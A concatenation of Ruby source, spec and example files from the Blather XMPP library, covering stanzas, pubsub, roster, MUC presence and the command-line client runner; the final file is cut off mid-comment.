<file_sep>/lib/blather/errors/stream_error.rb
module Blather
# Stream Errors
# [RFC3920 Section 9.3](http://xmpp.org/rfcs/rfc3920.html#streams-error-rules)
#
# @handler :stream_error
class StreamError < BlatherError
# @private
STREAM_ERR_NS = 'urn:ietf:params:xml:ns:xmpp-streams'
register :stream_error
attr_reader :text, :extras
# Factory method for instantiating the proper class for the error
#
# @param [Blather::XMPPNode] node the importable node
def self.import(node)
name = node.find_first('descendant::*[name()!="text"]', STREAM_ERR_NS).element_name
text = node.find_first 'descendant::*[name()="text"]', STREAM_ERR_NS
text = text.content if text
extras = node.find("descendant::*[namespace-uri()!='#{STREAM_ERR_NS}']").map { |n| n }
self.new name, text, extras
end
# Create a new Stream Error
# [RFC3920 Section 4.7.2](http://xmpp.org/rfcs/rfc3920.html#rfc.section.4.7.2)
#
# @param [String] name the error name
# @param [String, nil] text optional error text
# @param [Array<Blather::XMPPNode>] extras an array of extras to attach to the
# error
def initialize(name, text = nil, extras = [])
@name = name
@text = text
@extras = extras
end
# The error name
#
# @return [Symbol]
def name
@name.gsub('-','_').to_sym
end
# Creates an XML node from the error
#
# @return [Blather::XMPPNode]
def to_node
node = XMPPNode.new('error')
node.namespace = {'stream' => Blather::Stream::STREAM_NS}
node << (err = XMPPNode.new(@name, node.document))
err.namespace = 'urn:ietf:params:xml:ns:xmpp-streams'
if self.text
node << (text = XMPPNode.new('text', node.document))
text.namespace = 'urn:ietf:params:xml:ns:xmpp-streams'
text.content = self.text
end
self.extras.each { |extra| node << extra.dup }
node
end
# Convert the object to a proper node then convert it to a string
#
# @return [String]
def to_xml(*args)
to_node.to_xml(*args)
end
# @private
def inspect
"Stream Error (#{@name}): #{self.text}" + (self.extras.empty? ? '' : " [#{self.extras}]")
end
# @private
alias_method :to_s, :inspect
end # StreamError
end # Blather
<file_sep>/lib/blather/stanza.rb
module Blather
# # Base XMPP Stanza
#
# All stanzas inherit this class. It provides a set of methods and helpers
# common to all XMPP Stanzas
#
# @handler :stanza
class Stanza < XMPPNode
# @private
@@last_id = 0
# @private
@@handler_list = []
class_attribute :handler_hierarchy
attr_writer :handler_hierarchy
# Registers a callback onto the callback stack
#
# @param [Symbol] handler the name of the handler
# @param [Symbol, String, nil] name the name of the first element in the
# stanza. If nil the inherited name will be used. If that's nil the
# handler name will be used.
# @param [String, nil] ns the namespace of the stanza
def self.register(handler, name = nil, ns = nil)
@@handler_list << handler
self.handler_hierarchy ||= [:stanza]
self.handler_hierarchy = [handler] + self.handler_hierarchy
name = name || self.registered_name || handler
super name, ns
end
def initialize(*args)
super
@handler_hierarchy = []
end
def handler_hierarchy
@handler_hierarchy + self.class.handler_hierarchy
end
# The handler stack for the current stanza class
#
# @return [Array<Symbol>]
def self.handler_list
@@handler_list
end
# Helper method that creates a unique ID for stanzas
#
# @return [String] a new unique ID
def self.next_id
@@last_id += 1
'blather%04x' % @@last_id
end
# Check if the stanza is an error stanza
#
# @return [true, false]
def error?
self.type == :error
end
# Creates a copy with to and from swapped
#
# @param [Hash] opts options to pass to reply!
# @option opts [Boolean] :remove_children Wether or not to remove child nodes when replying
#
# @return [Blather::Stanza]
def reply(opts = {})
self.dup.reply! opts
end
# Swaps from and to
#
# @param [Hash] opts Misc options
# @option opts [Boolean] :remove_children Wether or not to remove child nodes when replying
#
# @return [self]
def reply!(opts = {})
opts = {:remove_children => false}.merge opts
self.to, self.from = self.from, self.to
self.children.remove if opts[:remove_children]
self
end
# Get the stanza's ID
#
# @return [String, nil]
def id
read_attr :id
end
# Set the stanza's ID
#
# @param [#to_s] id the new stanza ID
def id=(id)
write_attr :id, id
end
# Get the stanza's to
#
# @return [Blather::JID, nil]
def to
JID.new(self[:to]) if self[:to]
end
# Set the stanza's to field
#
# @param [#to_s] to the new JID for the to field
def to=(to)
write_attr :to, to
end
# Get the stanza's from
#
# @return [Blather::JID, nil]
def from
JID.new(self[:from]) if self[:from]
end
# Set the stanza's from field
#
# @param [#to_s] from the new JID for the from field
def from=(from)
write_attr :from, from
end
# Get the stanza's type
#
# @return [Symbol, nil]
def type
read_attr :type, :to_sym
end
# Set the stanza's type
#
# @param [#to_s] type the new stanza type
def type=(type)
write_attr :type, type
end
# Create an error stanza from the current stanza
#
# @param [String] name the error name
# @param [<Blather::StanzaError::VALID_TYPES>] type the error type
# @param [String, nil] text the error text
# @param [Array<XML::Node>] extras an array of extra nodes to attach to
# the error
#
# @return [Blather::StanzaError]
def as_error(name, type, text = nil, extras = [])
StanzaError.new self, name, type, text, extras
end
protected
# @private
def reply_if_needed!
unless @reversed_endpoints
reply!
@reversed_endpoints = true
end
self
end
end
end
<file_sep>/lib/blather/client/dsl/pubsub.rb
module Blather
module DSL
# A helper class for providing a simplified PubSub interface to the
# DSL
class PubSub
attr_accessor :host
# Create a new pubsub DSL
#
# @param [Blather::Client] client the client who's connection will be used
# @param [#to_s] host the PubSub host
def initialize(client, host)
@client = client
@host = host
end
# Retrieve Affiliations
#
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Hash] affiliations See {Blather::Stanza::PubSub::Affiliations#list}
def affiliations(host = nil, &callback)
request Stanza::PubSub::Affiliations.new(:get, send_to(host)), :list, callback
end
# Retrieve Subscriptions
#
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Hash] affiliations See {Blather::Stanza::PubSub::Subscriptions#list}
def subscriptions(host = nil, &callback)
request Stanza::PubSub::Subscriptions.new(:get, send_to(host)), :list, callback
end
# Discover Nodes
#
# @param [#to_s] path the node path
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Array<Blather::Stanza::DiscoItems::Item>] items
def nodes(path = nil, host = nil, &callback)
path ||= '/'
stanza = Stanza::DiscoItems.new(:get, path)
stanza.to = send_to(host)
request stanza, :items, callback
end
# Discover node information
#
# @param [#to_s] path the node path
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Blather::Stanza::DiscoInfo>] info
def node(path, host = nil, &callback)
stanza = Stanza::DiscoInfo.new(:get, path)
stanza.to = send_to(host)
request stanza, nil, callback
end
# Retrieve items for a node
#
# @param [#to_s] path the node path
# @param [Array<#to_s>] list a list of IDs to retrieve
# @param [Fixnum, #to_s] max the maximum number of items to return
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Array<Blather::Stanza::PubSub::PubSubItem>] items see {Blather::Stanza::PubSub::Items#items}
def items(path, list = [], max = nil, host = nil, &callback)
request(
Stanza::PubSub::Items.request(send_to(host), path, list, max),
:items,
callback
)
end
# Subscribe to a node
#
# @param [#to_s] node the node to subscribe to
# @param [Blather::JID, #to_s] jid is the jid that should be used.
# Defaults to the stripped current JID
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Blather::Stanza] stanza the reply stanza
def subscribe(node, jid = nil, host = nil)
jid ||= client.jid.stripped
stanza = Stanza::PubSub::Subscribe.new(:set, send_to(host), node, jid)
request(stanza) { |n| yield n if block_given? }
end
# Unsubscribe from a node
#
# @param [#to_s] node the node to unsubscribe from
# @param [Blather::JID, #to_s] jid is the jid that should be used.
# Defaults to the stripped current JID
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Blather::Stanza] stanza the reply stanza
def unsubscribe(node, jid = nil, subid = nil, host = nil)
jid ||= client.jid.stripped
stanza = Stanza::PubSub::Unsubscribe.new(:set, send_to(host), node, jid, subid)
request(stanza) { |n| yield n if block_given? }
end
# Publish an item to a node
#
# @param [#to_s] node the node to publish to
# @param [#to_s] payload the payload to send see {Blather::Stanza::PubSub::Publish}
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Blather::Stanza] stanza the reply stanza
def publish(node, payload, host = nil)
stanza = Stanza::PubSub::Publish.new(send_to(host), node, :set, payload)
request(stanza) { |n| yield n if block_given? }
end
# Delete items from a node
#
# @param [#to_s] node the node to delete from
# @param [Array<#to_s>] ids a list of ids to delete
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Blather::Stanza] stanza the reply stanza
def retract(node, ids = [], host = nil)
stanza = Stanza::PubSub::Retract.new(send_to(host), node, :set, ids)
request(stanza) { |n| yield n if block_given? }
end
# Create a node
#
# @param [#to_s] node the node to create
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @param [optional, Blather::Stanza::X] configuration the additional configuration to be set to created node
# @yield [Blather::Stanza] stanza the reply stanza
def create(node, host = nil, configuration = nil)
stanza = Stanza::PubSub::Create.new(:set, send_to(host), node)
stanza.configure_node << configuration if configuration
request(stanza) { |n| yield n if block_given? }
end
# Purge all node items
#
# @param [#to_s] node the node to purge
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Blather::Stanza] stanza the reply stanza
def purge(node, host = nil)
stanza = Stanza::PubSubOwner::Purge.new(:set, send_to(host), node)
request(stanza) { |n| yield n if block_given? }
end
# Delete a node
#
# @param [#to_s] node the node to delete
# @param [#to_s] host the PubSub host (defaults to the initialized host)
# @yield [Blather::Stanza] stanza the reply stanza
def delete(node, host = nil)
stanza = Stanza::PubSubOwner::Delete.new(:set, send_to(host), node)
request(stanza) { |n| yield n if block_given? }
end
private
def request(node, method = nil, callback = nil, &block)
unless block_given?
block = lambda do |node|
callback.call(method ? node.__send__(method) : node)
end
end
client.write_with_handler(node, &block)
end
def send_to(host = nil)
raise 'You must provide a host' unless (host ||= @host)
host
end
def client
@client
end
end # PubSub
end # DSL
end # Blather
<file_sep>/lib/blather/stanza/pubsub_owner/purge.rb
module Blather
class Stanza
class PubSubOwner
# # PubSubOwner Purge Stanza
#
# [XEP-0060 Section 8.5 - Purge All Node Items](http://xmpp.org/extensions/xep-0060.html#owner-purge)
#
# @handler :pubsub_purge
class Purge < PubSubOwner
register :pubsub_purge, :purge, self.registered_ns
# Create a new purge stanza
#
# @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
# @param [String] host the host to send the request to
# @param [String] node the name of the node to purge
def self.new(type = :set, host = nil, node = nil)
new_node = super(type, host)
new_node.node = node
new_node
end
# Get the name of the node to delete
#
# @return [String]
def node
purge_node[:node]
end
# Set the name of the node to delete
#
# @param [String] node
def node=(node)
purge_node[:node] = node
end
# Get or create the actual purge node on the stanza
#
# @return [Blather::XMPPNode]
def purge_node
unless purge_node = pubsub.find_first('ns:purge', :ns => self.class.registered_ns)
self.pubsub << (purge_node = XMPPNode.new('purge', self.document))
purge_node.namespace = self.pubsub.namespace
end
purge_node
end
end # Retract
end # PubSub
end # Stanza
end # Blather
<file_sep>/lib/blather/client.rb
require 'optparse'
if !defined?(Blather::DSL)
require File.join(File.dirname(__FILE__), *%w[client dsl])
include Blather::DSL
end
options = {}
optparse = OptionParser.new do |opts|
opts.banner = "Run with #{$0} [options] user@server/resource password [host] [port]"
opts.on('-D', '--debug', 'Run in debug mode (you will see all XMPP communication)') do
options[:debug] = true
end
opts.on('-d', '--daemonize', 'Daemonize the process') do |daemonize|
options[:daemonize] = daemonize
end
opts.on('--pid=[PID]', 'Write the PID to this file') do |pid|
if !File.writable?(File.dirname(pid))
$stderr.puts "Unable to write log file to #{pid}"
exit 1
end
options[:pid] = pid
end
opts.on('--log=[LOG]', 'Write to the [LOG] file instead of stdout/stderr') do |log|
if !File.writable?(File.dirname(log))
$stderr.puts "Unable to write log file to #{log}"
exit 1
end
options[:log] = log
end
opts.on('--certs=[CERTS DIRECTORY]', 'The directory path where the trusted certificates are stored') do |certs|
if !File.directory?(certs)
$stderr.puts "The certs directory path (#{certs}) is no good."
exit 1
end
options[:certs] = certs
end
opts.on_tail('-h', '--help', 'Show this message') do
puts opts
exit
end
opts.on_tail('-v', '--version', 'Show version') do
require 'yaml'
version = YAML.load_file File.join(File.dirname(__FILE__), %w[.. .. VERSION.yml])
puts "Blather v#{version[:major]}.#{version[:minor]}.#{version[:patch]}"
exit
end
end
optparse.parse!
at_exit do
unless client.setup?
if ARGV.length < 2
puts optparse
exit 1
end
client.setup(*ARGV)
end
def at_exit_run(options)
$stdin.reopen("/dev/null") if options[:daemonize] && $stdin.tty?
if options[:log]
log = File.new(options[:log], 'a')
log.sync = options[:debug]
$stdout.reopen log
$stderr.reopen $stdout
end
Blather.logger.level = Logger::DEBUG if options[:debug]
trap(:INT) { EM.stop }
trap(:TERM) { EM.stop }
EM.run { client.run }
end
if options[:daemonize]
pid = fork do
Process.setsid
exit if fork
File.open(options[:pid], 'w') { |f| f << Process.pid } if options[:pid]
at_exit_run options
FileUtils.rm(options[:pid]) if options[:pid]
end
::Process.detach pid
exit
else
at_exit_run options
end
end
<file_sep>/spec/blather/stream/ssl_spec.rb
require 'spec_helper'
describe Blather::CertStore do
let(:cert_dir) { File.expand_path '../../fixtures', File.dirname(__FILE__) }
let(:cert_path) { File.join cert_dir, 'certificate.crt' }
let(:cert) { File.read cert_path }
subject do
Blather::CertStore.new cert_dir
end
it 'can verify valid cert' do
expect(subject.trusted?(cert)).to be true
end
it 'can verify invalid cert' do
expect(subject.trusted?('foo bar baz')).to be_nil
end
it 'cannot verify when the cert authority is not trusted' do
@store = Blather::CertStore.new("../")
expect(@store.trusted?(cert)).to be false
end
end
<file_sep>/spec/blather/stanza/pubsub_owner/purge_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSubOwner::Purge do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:purge, 'http://jabber.org/protocol/pubsub#owner')).to eq(Blather::Stanza::PubSubOwner::Purge)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(<<-NODE)).to be_instance_of Blather::Stanza::PubSubOwner::Purge
<iq type='set'
from='<EMAIL>/elsinore'
to='pubsub.shakespeare.lit'
id='purge1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub#owner'>
<purge node='princely_musings'/>
</pubsub>
</iq>
NODE
end
it 'ensures an purge node is present on create' do
purge = Blather::Stanza::PubSubOwner::Purge.new
expect(purge.find('//ns:pubsub/ns:purge', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_empty
end
it 'ensures an purge node exists when calling #purge_node' do
purge = Blather::Stanza::PubSubOwner::Purge.new
purge.pubsub.remove_children :purge
expect(purge.find('//ns:pubsub/ns:purge', :ns => Blather::Stanza::PubSubOwner.registered_ns)).to be_empty
expect(purge.purge_node).not_to be_nil
expect(purge.find('//ns:pubsub/ns:purge', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
purge = Blather::Stanza::PubSubOwner::Purge.new
expect(purge.type).to eq(:set)
end
it 'sets the host if requested' do
purge = Blather::Stanza::PubSubOwner::Purge.new :set, 'pubsub.jabber.local'
expect(purge.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
purge = Blather::Stanza::PubSubOwner::Purge.new :set, 'host', 'node-name'
expect(purge.node).to eq('node-name')
end
end
<file_sep>/lib/blather/stanza/presence/muc_user.rb
require 'blather/stanza/muc/muc_user_base'
module Blather
class Stanza
class Presence
class MUCUser < Presence
include Blather::Stanza::MUC::MUCUserBase
def self.decorator_modules
super + [Blather::Stanza::MUC::MUCUserBase]
end
register :muc_user_presence, :x, MUC_USER_NAMESPACE
module InstanceMethods
def affiliation
item.affiliation
end
def affiliation=(val)
item.affiliation = val
end
def role
item.role
end
def role=(val)
item.role = val
end
def jid
item.jid
end
def jid=(val)
item.jid = val
end
def status_codes
status.map &:code
end
def status_codes=(val)
muc_user.remove_children :status
val.each do |code|
muc_user << Status.new(code)
end
end
def item
if item = muc_user.find_first('ns:item', :ns => MUCUser.registered_ns)
Item.new item
else
muc_user << (item = Item.new nil, nil, nil, self.document)
item
end
end
def status
muc_user.find('ns:status', :ns => MUCUser.registered_ns).map do |status|
Status.new status
end
end
end
include InstanceMethods
class Item < XMPPNode
def self.new(affiliation = nil, role = nil, jid = nil, document = nil)
new_node = super :item, document
case affiliation
when self
affiliation.document ||= document
return affiliation
when Nokogiri::XML::Node
new_node.inherit affiliation
when Hash
new_node.affiliation = affiliation[:affiliation]
new_node.role = affiliation[:role]
new_node.jid = affiliation[:jid]
else
new_node.affiliation = affiliation
new_node.role = role
new_node.jid = jid
end
new_node
end
def affiliation
read_attr :affiliation, :to_sym
end
def affiliation=(val)
write_attr :affiliation, val
end
def role
read_attr :role, :to_sym
end
def role=(val)
write_attr :role, val
end
def jid
read_attr :jid
end
def jid=(val)
write_attr :jid, val
end
end
class Status < XMPPNode
def self.new(code = nil)
new_node = super :status
case code
when self.class
return code
when Nokogiri::XML::Node
new_node.inherit code
when Hash
new_node.code = code[:code]
else
new_node.code = code
end
new_node
end
def code
read_attr :code, :to_i
end
def code=(val)
write_attr :code, val
end
end
end # MUC
end # Presence
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/iq/roster.rb
module Blather
class Stanza
class Iq
# # Roster Stanza
#
# [RFC 3921 Section 7 - Roster Management](http://xmpp.org/rfcs/rfc3921.html#roster)
#
# @handler :roster
class Roster < Query
register :roster, nil, 'jabber:iq:roster'
# Create a new roster stanza and (optionally) load it with an item
#
# @param [<Blather::Stanza::Iq::VALID_TYPES>] type the stanza type
# @param [Blather::XMPPNode] item a roster item
def self.new(type = nil, item = nil)
node = super type
node.query << item if item
node
end
# Inherit the XMPPNode to create a proper Roster object.
# Creates RosterItem objects out of each roster item as well.
#
# @param [Blather::XMPPNode] node a node to inherit
def inherit(node)
# remove the current set of nodes
remove_children :item
super
# transmogrify nodes into RosterItems
items.each { |i| query << RosterItem.new(i); i.remove }
self
end
# The list of roster items
#
# @return [Array<Blather::Stanza::Iq::Roster::RosterItem>]
def items
query.find('//ns:item', :ns => self.class.registered_ns).map do |i|
RosterItem.new i
end
end
# The provided roster version if available
#
# @return [String]
def version
query[:ver]
end
# # RosterItem Fragment
#
# Individual roster items.
# This is a convenience class to attach methods to the node
class RosterItem < XMPPNode
register :item, Roster.registered_ns
# Create a new RosterItem
# @overload new(XML::Node)
# Create a RosterItem by inheriting a node
# @param [XML::Node] node an xml node to inherit
# @overload new(opts)
# Create a RosterItem through a hash of options
# @param [Hash] opts the options
# @option opts [Blather::JID, String, nil] :jid the JID of the item
# @option opts [String, nil] :name the alias to give the JID
# @option opts [Symbol, nil] :subscription the subscription status of
# the RosterItem must be one of
# Blather::RosterItem::VALID_SUBSCRIPTION_TYPES
# @option opts [:subscribe, nil] :ask the ask value of the RosterItem
# @option opts [Array<#to_s>] :groups the group names the RosterItem is a member of
# @overload new(jid = nil, name = nil, subscription = nil, ask = nil)
# @param [Blather::JID, String, nil] jid the JID of the item
# @param [String, nil] name the alias to give the JID
# @param [Symbol, nil] subscription the subscription status of the
# RosterItem must be one of
# Blather::RosterItem::VALID_SUBSCRIPTION_TYPES
# @param [:subscribe, nil] ask the ask value of the RosterItem
# @param [Array<#to_s>] groups the group names the RosterItem is a member of
def self.new(jid = nil, name = nil, subscription = nil, ask = nil, groups = nil)
new_node = super :item
case jid
when Nokogiri::XML::Node
new_node.inherit jid
when Hash
new_node.jid = jid[:jid]
new_node.name = jid[:name]
new_node.subscription = jid[:subscription]
new_node.ask = jid[:ask]
new_node.groups = jid[:groups]
else
new_node.jid = jid
new_node.name = name
new_node.subscription = subscription
new_node.ask = ask
new_node.groups = groups
end
new_node
end
# Get the JID attached to the item
#
# @return [Blather::JID, nil]
def jid
(j = self[:jid]) ? JID.new(j) : nil
end
# Set the JID of the item
#
# @param [Blather::JID, String, nil] jid the new JID
def jid=(jid)
write_attr :jid, (jid.nil?) ? nil : JID.new(jid).stripped
end
# Get the item name
#
# @return [String, nil]
def name
read_attr :name
end
# Set the item name
#
# @param [#to_s] name the name of the item
def name=(name)
write_attr :name, name
end
# Get the subscription value of the item
#
# @return [<:both, :from, :none, :remove, :to>]
def subscription
read_attr :subscription, :to_sym
end
# Set the subscription value of the item
#
# @param [<:both, :from, :none, :remove, :to>] subscription
def subscription=(subscription)
write_attr :subscription, subscription
end
# Get the ask value of the item
#
# @return [<:subscribe, nil>]
def ask
read_attr :ask, :to_sym
end
# Set the ask value of the item
#
# @param [<:subscribe, nil>] ask
def ask=(ask)
write_attr :ask, ask
end
# The groups roster item belongs to
#
# @return [Array<String>]
def groups
find('child::*[local-name()="group"]').map { |g| g.content }
end
# Set the roster item's groups
#
# @param [Array<#to_s>] new_groups an array of group names
def groups=(new_groups)
remove_children :group
if new_groups
new_groups.uniq.each do |g|
self << (group = XMPPNode.new(:group, self.document))
group.content = g
end
end
end
# Convert the roster item to a proper stanza all wrapped up
# This facilitates new subscriptions
#
# @return [Blather::Stanza::Iq::Roster]
def to_stanza
Roster.new(:set, self)
end
end #RosterItem
end #Roster
end #Iq
end #Stanza
end
<file_sep>/examples/MUC_echo.rb
require 'blather/client/dsl'
module MUC
extend Blather::DSL
when_ready do
puts "Connected ! send messages to #{jid.stripped}."
join 'room_name', 'nick_name'
end
message :groupchat?, :body, proc { |m| m.from != jid.stripped }, delay: nil do |m|
echo = Blather::Stanza::Message.new
echo.to = room
echo.body = m.body
echo.type = 'groupchat'
client.write echo
end
end
MUC.setup 'username', '<PASSWORD>'
EM.run { MUC.run }
<file_sep>/spec/blather/stanza/presence/muc_spec.rb
require 'spec_helper'
def muc_xml
<<-XML
<presence from='<EMAIL>/pda'
id='n13mt3l'
to='<EMAIL>/thirdwitch'>
<x xmlns='http://jabber.org/protocol/muc'/>
</presence>
XML
end
describe 'Blather::Stanza::Presence::MUC' do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:x, 'http://jabber.org/protocol/muc' )).to eq(Blather::Stanza::Presence::MUC)
end
it 'must be importable' do
c = Blather::XMPPNode.parse(muc_xml)
expect(c).to be_kind_of Blather::Stanza::Presence::MUC::InstanceMethods
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUC.registered_ns).count).to eq(1)
end
it 'ensures a form node is present on create' do
c = Blather::Stanza::Presence::MUC.new
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUC.registered_ns)).not_to be_empty
end
it 'ensures a form node exists when calling #muc' do
c = Blather::Stanza::Presence::MUC.new
c.remove_children :x
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUC.registered_ns)).to be_empty
expect(c.muc).not_to be_nil
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUC.registered_ns)).not_to be_empty
end
end
<file_sep>/yard/templates/default/class/setup.rb
def init
super
sections.place(:handlers).after(:box_info)
end
def handlers
@handler_stack = object.inheritance_tree.map { |o| o.tag(:handler).name if (o.respond_to?(:tag) && o.tag(:handler)) }.compact
return if @handler_stack.empty?
erb(:handlers)
end
<file_sep>/examples/stream_only.rb
#!/usr/bin/env ruby
require 'rubygems'
require 'blather'
trap(:INT) { EM.stop }
trap(:TERM) { EM.stop }
EM.run do
Blather::Stream::Client.start(Class.new {
attr_accessor :jid
def post_init(stream, jid = nil)
@stream = stream
self.jid = jid
@stream.send_data Blather::Stanza::Presence::Status.new
puts "Stream started!"
end
def receive_data(stanza)
@stream.send_data stanza.reply!
end
def unbind
puts "Stream ended!"
end
}.new, '<EMAIL>', 'echo')
end
<file_sep>/lib/blather.rb
# Require the necessary files
%w[
rubygems
eventmachine
niceogiri
ipaddr
digest/md5
digest/sha1
logger
openssl
active_support/core_ext/class/attribute
active_support/core_ext/object/blank
blather/core_ext/eventmachine
blather/core_ext/ipaddr
blather/cert_store
blather/errors
blather/errors/sasl_error
blather/errors/stanza_error
blather/errors/stream_error
blather/file_transfer
blather/file_transfer/ibb
blather/file_transfer/s5b
blather/jid
blather/roster
blather/roster_item
blather/xmpp_node
blather/stanza
blather/stanza/iq
blather/stanza/iq/command
blather/stanza/iq/ibb
blather/stanza/iq/ping
blather/stanza/iq/query
blather/stanza/iq/ibr
blather/stanza/iq/roster
blather/stanza/iq/s5b
blather/stanza/iq/si
blather/stanza/iq/vcard
blather/stanza/disco
blather/stanza/disco/disco_info
blather/stanza/disco/disco_items
blather/stanza/disco/capabilities
blather/stanza/message
blather/stanza/message/muc_user
blather/stanza/presence
blather/stanza/presence/c
blather/stanza/presence/status
blather/stanza/presence/subscription
blather/stanza/presence/muc
blather/stanza/presence/muc_user
blather/stanza/pubsub
blather/stanza/pubsub/affiliations
blather/stanza/pubsub/create
blather/stanza/pubsub/event
blather/stanza/pubsub/items
blather/stanza/pubsub/publish
blather/stanza/pubsub/retract
blather/stanza/pubsub/subscribe
blather/stanza/pubsub/subscription
blather/stanza/pubsub/subscriptions
blather/stanza/pubsub/unsubscribe
blather/stanza/pubsub_owner
blather/stanza/pubsub_owner/delete
blather/stanza/pubsub_owner/purge
blather/stanza/x
blather/stream
blather/stream/client
blather/stream/component
blather/stream/parser
blather/stream/features
blather/stream/features/resource
blather/stream/features/sasl
blather/stream/features/session
blather/stream/features/tls
blather/stream/features/register
].each { |r| require r }
module Blather
@@logger = nil
class << self
# Default logger level. Any internal call to log() will forward the log message to
# the default log level
attr_accessor :default_log_level
def logger
@@logger ||= Logger.new($stdout).tap {|logger| logger.level = Logger::INFO }
end
def logger=(logger)
@@logger = logger
end
def default_log_level
@default_log_level ||= :debug # by default is debug (as it used to be)
end
def log(message)
logger.send self.default_log_level, message
end
end
end
<file_sep>/lib/blather/stanza/presence.rb
module Blather
class Stanza
# # Presence Stanza
#
# [RFC 3921 Section 2.2 - Presence Syntax](http://xmpp.org/rfcs/rfc3921.html#stanzas-presence)
#
# Within Blather most of the interaction with Presence stanzas will be
# through one of its child classes: Status or Subscription.
#
# Presence stanzas are used to express an entity's current network
# availability (offline or online, along with various sub-states of the
# latter and optional user-defined descriptive text), and to notify other
# entities of that availability. Presence stanzas are also used to negotiate
# and manage subscriptions to the presence of other entities.
#
# ## "Type" Attribute
#
# The `type` attribute of a presence stanza is optional. A presence stanza
# that does not possess a `type` attribute is used to signal to the server
# that the sender is online and available for communication. If included,
# the `type` attribute specifies a lack of availability, a request to manage
# a subscription to another entity's presence, a request for another
# entity's current presence, or an error related to a previously-sent
# presence stanza. If included, the `type` attribute must have one of the
# following values:
#
# * `:unavailable` -- Signals that the entity is no longer available for
# communication
#
# * `:subscribe` -- The sender wishes to subscribe to the recipient's
# presence.
#
# * `:subscribed` -- The sender has allowed the recipient to receive their
# presence.
#
# * `:unsubscribe` -- The sender is unsubscribing from another entity's
# presence.
#
# * `:unsubscribed` -- The subscription request has been denied or a
# previously-granted subscription has been cancelled.
#
# * `:probe` -- A request for an entity's current presence; should be
# generated only by a server on behalf of a user.
#
# * `:error` -- An error has occurred regarding processing or delivery of a
# previously-sent presence stanza.
#
# Blather provides a helper for each possible type:
#
# Presence#unavailabe?
# Presence#unavailable?
# Presence#subscribe?
# Presence#subscribed?
# Presence#unsubscribe?
# Presence#unsubscribed?
# Presence#probe?
# Presence#error?
#
# Blather treats the `type` attribute like a normal ruby object attribute
# providing a getter and setter. The default `type` is nil.
#
# presence = Presence.new
# presence.type # => nil
# presence.type = :unavailable
# presence.unavailable? # => true
# presence.error? # => false
#
# presence.type = :invalid # => RuntimeError
#
# @handler :presence
class Presence < Stanza
# @private
VALID_TYPES = [ :unavailable,
:subscribe,
:subscribed,
:unsubscribe,
:unsubscribed,
:probe,
:error].freeze
register :presence
# Creates a class based on the presence type
# either a Status or Subscription object is created based
# on the type attribute.
# If neither is found it instantiates a Presence object
def self.import(node, *decorators) # :nodoc:
node.children.each do |e|
ns = e.namespace ? e.namespace.href : nil
klass = class_from_registration e.element_name, ns
decorators << klass if klass
end
case node['type']
when nil, 'unavailable'
decorators << Status
when /subscribe/
decorators << Subscription
end
super node, *decorators
end
# Ensure element_name is "presence" for all subclasses
def self.new(*args)
super :presence
end
# Check if the IQ is of type :unavailable
#
# @return [true, false]
def unavailable?
self.type == :unavailable
end
# Check if the IQ is of type :subscribe
#
# @return [true, false]
def subscribe?
self.type == :subscribe
end
# Check if the IQ is of type :subscribed
#
# @return [true, false]
def subscribed?
self.type == :subscribed
end
# Check if the IQ is of type :unsubscribe
#
# @return [true, false]
def unsubscribe?
self.type == :unsubscribe
end
# Check if the IQ is of type :unsubscribed
#
# @return [true, false]
def unsubscribed?
self.type == :unsubscribed
end
# Check if the IQ is of type :probe
#
# @return [true, false]
def probe?
self.type == :probe
end
# Check if the IQ is of type :error
#
# @return [true, false]
def error?
self.type == :error
end
# Ensures type is one of Blather::Stanza::Presence::VALID_TYPES
#
# @param [#to_sym] type the Presence type. Must be one of VALID_TYPES
def type=(type)
if type && !VALID_TYPES.include?(type.to_sym)
raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
end
super
end
end
end #Stanza
end
<file_sep>/lib/blather/stanza/pubsub/event.rb
module Blather
class Stanza
class PubSub
# # PubSub Event Stanza
#
# [XEP-0060](http://xmpp.org/extensions/xep-0060.html)
#
# The PubSub Event stanza is used in many places. Please see the XEP for more
# information.
#
# @handler :pubsub_event
class Event < Message
# @private
SHIM_NS = 'http://jabber.org/protocol/shim'.freeze
register :pubsub_event, :event, 'http://jabber.org/protocol/pubsub#event'
# Ensures the event_node is created
# @private
def self.new(type = nil)
node = super
node.event_node
node
end
# Kill the event_node node before running inherit
# @private
def inherit(node)
event_node.remove
super
end
# Get the name of the node
#
# @return [String, nil]
def node
!purge? ? items_node[:node] : purge_node[:node]
end
# Get a list of retractions
#
# @return [Array<String>]
def retractions
items_node.find('//ns:retract', :ns => self.class.registered_ns).map do |i|
i[:id]
end
end
# Check if this is a retractions stanza
#
# @return [Boolean]
def retractions?
!retractions.empty?
end
# Get the list of items attached to this event
#
# @return [Array<Blather::Stanza::PubSub::PubSubItem>]
def items
items_node.find('//ns:item', :ns => self.class.registered_ns).map do |i|
PubSubItem.new(nil,nil,self.document).inherit i
end
end
# Check if this stanza has items
#
# @return [Boolean]
def items?
!items.empty?
end
# Check if this is a purge stanza
#
